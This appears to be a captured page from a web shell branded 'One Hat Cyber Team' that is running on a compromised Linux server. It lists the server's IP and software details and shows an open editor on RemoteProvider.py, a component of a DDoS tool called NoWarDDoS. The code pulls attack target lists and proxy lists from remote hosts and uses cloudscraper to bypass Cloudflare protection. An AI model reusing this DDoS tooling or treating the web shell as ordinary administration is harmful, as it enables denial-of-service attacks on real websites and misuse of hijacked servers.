One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
vo
/
ddos
/
NoWarDDoS
/
Edit File:
RemoteProvider.py
import time import json import cloudscraper from functools import lru_cache from random import choice from urllib.parse import unquote import settings class RemoteProvider: def __init__(self, targets=None): self.targets = [unquote(target) for target in targets] if targets else None self._proxies = [] self.sites = [] self.scraper = cloudscraper.create_scraper(browser=settings.BROWSER, ) def _scrap_json(self, link): host = choice(link) content = self.scraper.get(host).content if content: try: data = json.loads(content) return data except json.decoder.JSONDecodeError: raise Exception('Host {} has invalid format'.format(host)) except Exception: raise Exception('Unexpected error. Host {}'.format(host)) else: raise Exception('Unexpected error. Host {}'.format(host)) def _get_ttl_hash(seconds=settings.TARGET_UPDATE_RATE): """Return the same value within `seconds` time period""" return round(time.time() / seconds) @lru_cache() def get_target_sites(self, ttl_hash=_get_ttl_hash()): del ttl_hash if self.targets: self.sites = self.targets else: try: data = self._scrap_json(settings.SITES_HOSTS) self.sites = [] for site in data: if 'attack' not in site or ('attack' in site and not site['attack'] == 0): if not site['page'].startswith('http'): site['page'] = "https://" + site['page'] self.sites.append(unquote(site['page'])) except Exception as e: raise e return self.sites @lru_cache() def get_proxies(self, ttl_hash=_get_ttl_hash()): del ttl_hash try: data = self._scrap_json(settings.PROXIES_HOSTS) self._proxies = data except Exception as e: raise e return self._proxies
Simpan